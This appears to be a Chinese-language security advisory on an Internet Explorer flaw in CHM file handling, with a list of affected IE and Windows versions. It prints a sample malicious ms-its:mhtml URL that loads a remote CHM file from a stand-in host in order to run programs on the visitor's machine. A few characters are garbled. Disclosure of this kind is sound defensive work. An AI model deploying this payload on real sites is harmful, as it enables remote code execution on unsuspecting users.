受影響系統(tǒng):
Microsoft IE 6.0SP1
Microsoft IE 5.5SP2
Microsoft IE 5.5SP1
Microsoft IE 5.5
Microsoft IE 5.01
Microsoft IE 5.0.1SP3
Microsoft IE 5.0.1SP2
Microsoft IE 5.0.1SP1
Microsoft IE 6.0
Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows NT 4.0 SP6a
Microsoft Windows ME
Microsoft Windows 98 SE
Microsoft Windows 98
Microsoft Windows 2003 Web Edition
Microsoft Windows 2003 Standard Edition
Microsoft Windows 2003 Enterprise Edition 64-bit
Microsoft Windows 2003 Enterprise Edition
Microsoft Windows 2003 Datacenter Edition 64-bit
Microsoft Windows 2003 Datacenter Edition
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
詳細描述:
Microsoft IE是一款流行的WEB瀏覽器。Microsoft IE在處理CHM文件時存在漏洞,遠程攻擊者可以利用這個漏洞構建惡意頁面,誘使用戶訪問,可在目標用戶系統(tǒng)上自動和執(zhí)行程序。
構建類似包含如下信息的頁面:
ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm
可能導致程序在用戶系統(tǒng)上自動和執(zhí)行。
目前廠商還沒有提供補丁或者升級程序。
